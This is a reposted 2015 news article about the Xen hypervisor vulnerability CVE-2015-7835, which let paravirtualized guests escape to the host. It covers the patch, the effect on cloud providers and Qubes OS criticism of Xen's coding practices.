http://www.net-security.org/malware_news.php?id=3137

Critical vulnerability allowed some guests to access underlying operating system. by Dan Goodin - Oct 29, 2015 7:34pm EET For seven years, Xen virtualization software used by Amazon Web Services and other cloud computing providers has contained a vulnerability that allowed attackers to break out of their confined accounts and access extremely sensitive parts of the underlying operating system. The bug, which some researchers say is probably the worst ever to hit the open source project, was finallymade public Thursday along with a patch. "Venom" allows attackers to break out of guest OS, escape into host. Patch now! As a result of the bug, "malicious PV guest administrators can escalate privilege so as to control the whole system," Xen Project managers wrote in an advisory. The managers were referring to an approach known as paravirtualization, which allows multiple lower-privileged users to run highly isolated computing instances on the same piece of hardware. By allowing guests to break out of those confines, CVE-2015-7835, as the vulnerability is indexed, compromised a core tenet of virtualization. It comes five months after a similarly critical bug was disclosed in the Xen, KVM, and native QEMU virtual machine platforms."The above is a political way of stating the bug is a very critical one," researchers with Qubes OS, a desktop operating system that uses Xen to secure sensitive resources, wrote in an analysis published Thursday. "Probably the worst we have seen affecting the Xen hypervisor, ever. Sadly." Thursday's disclosure comes a few weeks after Xen Project managers privately warned a select group of predisclosure members of the vulnerability. That means Amazon and many other cloud services have already patched the vulnerability. It would also explain why some services have recently required customers to restart their guest operating systems. Members of Linode, for instance, received e-mails two weeks ago notifying them of Xen security advisories that would require a reboot no later than October 29, when the updates would go live. An Amazon advisory, meanwhile, said the update required no reboot. “Really shocking” The Qubes OS analysis criticized the development process that allowed a bug of such high severity to persist for such a long time. It also questioned whether it was time for Xen developers to redesign the hypervisor to do away with paravirtualized virtual machines. Qubes researchers wrote: Admittedly this is subtle bug, because there is no buggy code that could be spotted immediately. The bug emerges only if one looks at a bigger picture of logic flows (compare also QSB #09 for a somehow similar situation). On the other hand, it is really shocking that such a bug has been lurking in the core of the hypervisor for so many years. In our opinion the Xen project should rethink their coding guidelines and try to come up with practices and perhaps additional mechanisms that would not let similar flaws to plague the hypervisor ever again (assert-like mechanisms perhaps?). Otherwise the whole project makes no sense, at least to those who would like to use Xen for security-sensitive work. The vulnerability affects Xen version 3.4 and later, but only on x86 systems. ARM systems are not susceptible. Only paravirtualization guests can exploit the bug, and it doesn't matter if the guests are running 32-bit or 64-bit instances. Now that the vulnerability has gone public, it's a fair bet that unpatched systems will be exploited. Anyone relying on Xen who has not yet updated should install the patch as soon as possible. Sursa: http://arstechnica.com/security/2015/10/xen-patches-7-year-old-bug-that-shattered-hypervisor-security/